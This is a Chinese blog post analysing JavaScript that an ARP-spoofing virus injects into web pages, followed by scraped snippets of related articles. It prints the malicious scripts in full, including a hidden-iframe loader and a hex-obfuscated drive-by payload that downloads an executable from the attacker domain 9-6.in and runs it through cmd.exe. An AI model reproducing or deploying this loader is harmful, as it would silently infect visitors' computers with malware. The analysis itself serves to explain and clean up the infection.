arp病毒利用的JS技术

本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!

最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!

现象:

打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接----<script src=http://9-6.in/n.js></script>;

来源:

经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;

分析:

1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下:

  document.writeln("<script>window.onerror=function(){return true;}</script>");
   document.writeln("<script src="http://9-6.in/S368/NewJs2.js"></script>");
   document.writeln("<script>");
   document.writeln("function StartRun(){");
   document.writeln("var Then = new Date() ");
   document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
   document.writeln("var cookieString = new String(document.cookie)");
   document.writeln("var cookieHeader = "Cookie1=" ");
   document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
   document.writeln("if (beginPosition != -1){ ");
   document.writeln("} else ");
   document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ");
   document.writeln("document.write('<iframe width=0 height=0 src="http://9-6.IN/s368/T368.htm"></iframe>');");
   document.writeln("}");
   document.writeln("}");
   document.writeln("StartRun();");
   document.writeln("</script>")

其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉,真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还有个JS文件 http://9-6.in/S368/NewJs2.js,先继续往下看,找到StartRun();运行一个函数,函数的主要作用是写COOKIE,日期为保存一天,然后还用隐藏框架加载了一个文件(http://9-6.IN/s368/T368.htm),其余就没有什么特别的了;

2、下载(http://9-6.in/S368/NewJs2.js)这个文件,代码如下:

StrInfo = "x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +" "+
  "x3cx73x63x72x69x70x74x3e" +" "+
  " x44x5ax3d'\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +" "+
  "x7b " +" "+
  " x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +" "+
  " x72x65x74x75x72x6e '\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'\x78x32x45\x78x37x34\x78x36x44\x78x37x30'x3b" +" "+
  "x7d " +" "+
  " x74x72x79 " +" "+
  "x7b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +" "+
  " x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +" "+
  " x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +" "+
  " x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x41x53x2ex74x79x70x65x3dx31x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4bx78x2ex73x65x6ex64x28x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +" "+
  " x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +" "+
  " x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +" "+
  " x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x33x33\x78x33x32'x2c'\x78x36x33\x78x36x44\x78x36x34\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x29x3b" +" "+
  " x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'\x78x32x30\x78x32x46\x78x36x33 'x2bx4ex73x31x2c""x2c"\x78x36x46\x78x37x30\x78x36x35\x78x36x45"x2cx30x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x7d " +" "+
  " x63x61x74x63x68x28x4dx73x49x29 x7b x4dx73x49x3dx31x3b x7d" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x3cx2fx73x63x72x69x70x74x3e"
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"](StrInfo);

时间: 2024-09-11 10:34:07

arp病毒利用的JS技术的相关文章

解析arp病毒背后利用的Javascript技术附解密方法_javascript技巧

本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁! 最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助! 现象:打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接----<script src=http://9-6.in

如何清理网站被arp病毒插入js恶意代码?

网页被插入如下的arp病毒的js恶意代码script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\... 首先确定你的服务器上原文件  是否有这些代码 就是

extjs tabpanel不使iframe,利用锚点技术请求html,但是html中的js失效

问题描述 extjs tabpanel不使iframe,利用锚点技术请求html,但是html中的js失效 代码很简单 var tabPanel = new Ext.panel.Panel({ id: tabId, title: text, closable: true, layout: 'fit', deferredRender: false, loadMask: 'loading...', loader: { url: href, autoLoad: true, scripts: true

VB.Net写的ARP病毒攻击主机快速查找和批量绑定工具

问题描述 VB.Net写的免费绿色小工具大概40k如果你还在为找不到网内arp攻击主机而烦恼,还在为网内多台主机arp防护头疼,不妨也用看看.工具界面预览:工具下载地址:http://www.lob.cn/jq/skill/578.shtml简介:10秒快速查找arp病毒攻击主机,支持间断攻击与持续攻击的检测.30秒快速扫描同段主机的ip与mac地址,支持网关单独绑定与段内主机批量绑定.有兴趣的朋友也可以加入我们lob.cn一起做更多免费实用小工具帮助大家. 解决方案 解决方案二:看上很牛的嘛,

ARP病毒反复发作 反病毒专家支六招彻底防范

[搜狐IT消息]7月23日,"我曾经中了ARP病毒,为什么第一次中了后就会反复发作,即使清除干净后过一段时间后又出现了?有没有什么有效的清除方法?"近日,很多电脑用户提出类似问题,由于清除此类病毒异常困难,用户迫切希望能够了解怎样才能彻底防范此类病毒. 据江民反病毒专家介绍,ARP病毒发作时,通常会造成网络掉线,但网络连接正常,内网的部分电脑不能上网,或者所有电脑均不能上网,无法打开网页或打开网页慢以及局域网连接时断时续并且网速较慢等现象,严重影响到企业网络.网吧.校园网络等局域网的正

专家解读ARP病毒(完)

[编者按:前文,我们讲述了对ARP病毒电脑的查杀方法,这里是本系列文章的最后一篇,将告诉大家如何采取措施对ARP病毒免疫.] 七.ARP病毒的网络免疫措施 由于ARP病毒的种种网络特性,可以采用一些技术手段进行网络中ARP病毒欺骗数据包免疫.即便网络中有ARP中毒电脑,在发送欺骗的ARP数据包,其它电脑也不会修改自身的ARP缓存表,数据包始终发送给正确的网关,用的比较多的办法是"双向绑定法" . 双向绑定法,顾名思义,就是要在两端绑定IP-MAC地址,其中一端是在路由器中,把所有PC的

专家解读ARP病毒(四)

[编者按:前文,我们讲述了对中了ARP病毒电脑的定位方法,这里我们向大家介绍对ARP病毒电脑的查杀方法.] 六.ARP病毒电脑的查杀方法 通过上述的方法,已经找到了ARP中毒电脑,那么接下来的操作就是如何杀毒了.有一点需要注意的是:当找到中毒电脑后,应该立即拔掉中毒电脑的网线,以免其继续发包干扰全网的运行. 对于ARP病毒电脑的查杀办法,首先可以利用杀毒软件杀毒,但是由于现在病毒变种极其繁多,有可能遇到杀毒软件查不出来的情况,这时候就需要借助手工杀毒的办法了,下面介绍一些经验. 根据一些经验,较

专家解读ARP病毒(三)

[编者按:前文,我们讲述了ARP病毒新的表现形式及相关案例,这里我们向大家介绍对中了ARP病毒电脑的定位方法.] 五.ARP病毒电脑的定位方法 下面,又有了一个新的课题摆在我们面前:如何能够快速检测定位出局域网中的ARP病毒电脑? 面对着局域网中成百台电脑,一个一个地检测显然不是好办法.其实我们只要利用ARP病毒的基本原理:发送伪造的ARP欺骗广播,中毒电脑自身伪装成网关的特性,就可以快速锁定中毒电脑.可以设想用程序来实现以下功能:在网络正常的时候,牢牢记住正确网关的IP地址和MAC地址,并且实

专家解读ARP病毒(二)

[编者按:前文,我们讲述了ARP病毒的原理,这里我们向大家介绍ARP病毒新的表现形式及相关案例.] 四.ARP病毒新的表现形式 由于现在的网络游戏数据包在发送过程中,均已采用了强悍的加密算法,因此这类ARP病毒在解密数据包的时候遇到了很大的难度.现在又新出现了一种ARP病毒,与以前的一样的是,该类ARP病毒也是向全网发送伪造的ARP欺骗广播,自身伪装成网关.但区别是,它着重的不是对网络游戏数据包的解密,而是对于HTTP请求访问的修改. HTTP是应用层的协议,主要是用于WEB网页访问.还是以上面